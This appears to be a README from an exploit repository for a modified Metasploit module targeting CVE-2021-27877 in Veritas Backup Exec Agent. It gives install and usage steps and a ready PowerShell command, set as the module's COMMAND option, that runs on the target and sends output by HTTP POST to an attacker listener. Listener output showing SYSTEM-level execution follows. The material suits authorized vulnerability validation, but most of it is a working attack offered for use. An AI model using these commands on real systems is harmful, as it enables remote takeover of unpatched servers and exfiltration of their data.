Share
## https://sploitus.com/exploit?id=34CCFAD0-8C43-5B1F-B129-EC944F9BD546
# CVE-2021-27877 Proof of Concept

This repository contains a modified version of the original Rapid7 Metasploit module for CVE-2021-27877 affecting the Veritas Backup Exec Agent.

During my testing, the original Metasploit module successfully identified the target as vulnerable but consistently failed to establish a session because the payload delivery stage was unsuccessful. However, analysis of the module showed that authentication and the underlying command execution functionality were working correctly.

To simplify vulnerability validation, I modified the module to execute user-supplied operating system commands directly through the vulnerable NDMP command execution functionality instead of uploading and executing a payload. This makes it easier to confirm remote code execution without relying on a reverse shell or payload staging.

> **Disclaimer:** This proof of concept is provided for educational purposes and authorized security testing only. Only use it against systems you own or have explicit permission to assess.

> **Note:** To protect the environment used during testing, all IP addresses in this repository have been anonymized. Throughout the examples, `192.168.x.x` represents the target host, while `192.168.y.y` represents the attacking system or listener. These substitutions do not affect the functionality of the proof of concept.

---

## Changes

Compared to the original Rapid7 module, the following modifications have been made:

- Added a new `COMMAND` runtime option.
- Removed the dependency on uploading a payload.
- Executes a single user-specified command.
- Does not attempt to establish a Meterpreter session.

---

## Installation

Copy the modified module into your local Metasploit modules directory.

```bash
cp beagent_sha_auth_rce_custom.rb /usr/share/metasploit-framework/modules/exploits/multi/veritas/
```

Start (or restart) Metasploit and reload local modules:

```text
msfconsole
reload_all
```

---

## Usage

Before running the module, start an HTTP listener (or any web server capable of receiving and displaying HTTP POST requests). This listener will receive the output of the command executed on the target.

For example, you can use a simple Python HTTP server with a custom request handler, `nc`, or any HTTP listener of your choice.

Load the module:

```text
use exploit/multi/veritas/beagent_sha_auth_rce_custom
```

Configure the required options:

```text
set RHOSTS 192.168.x.x
set RPORT 10000

set COMMAND powershell -Command "$output = whoami; Invoke-WebRequest -Uri 'http://192.168.y.y:8080/' -Method POST -Body $output"

run
```

The `COMMAND` option accepts any command you wish to execute on the target.

---

## Retrieving Command Output

This module is designed to execute a single command and **does not return command output automatically**.

To retrieve output, use an appropriate callback mechanism within your command (for example, an HTTP POST request or another outbound channel) and monitor your listener.

Example listener output:

```text
Listening on 0.0.0.0 8080
Connection received on 192.168.x.x 26006
POST / HTTP/ 1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShe11/5.1.14393.9234
Content-Type: application/x-www-form-urlencoded
Host: 192.168.y.y:8080
Content-Length: 19
Expect: 100-continue
Connection: Keep-Alive

nt authority\system
```

---

## References

- [Rapid7 Metasploit Module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb)
- [Veritas Security Advisory (VTS21-001)](https://www.veritas.com/support/en_US/security/VTS21-001)
- [Medium Article](https://yashswarup12.medium.com/cve-2021-27877-analyzing-and-exploiting-veritas-backup-exec-remote-code-execution-5e31bc41eeef)

---

## Credits

- Original Metasploit module: Rapid7
- Modifications: Yash Swarup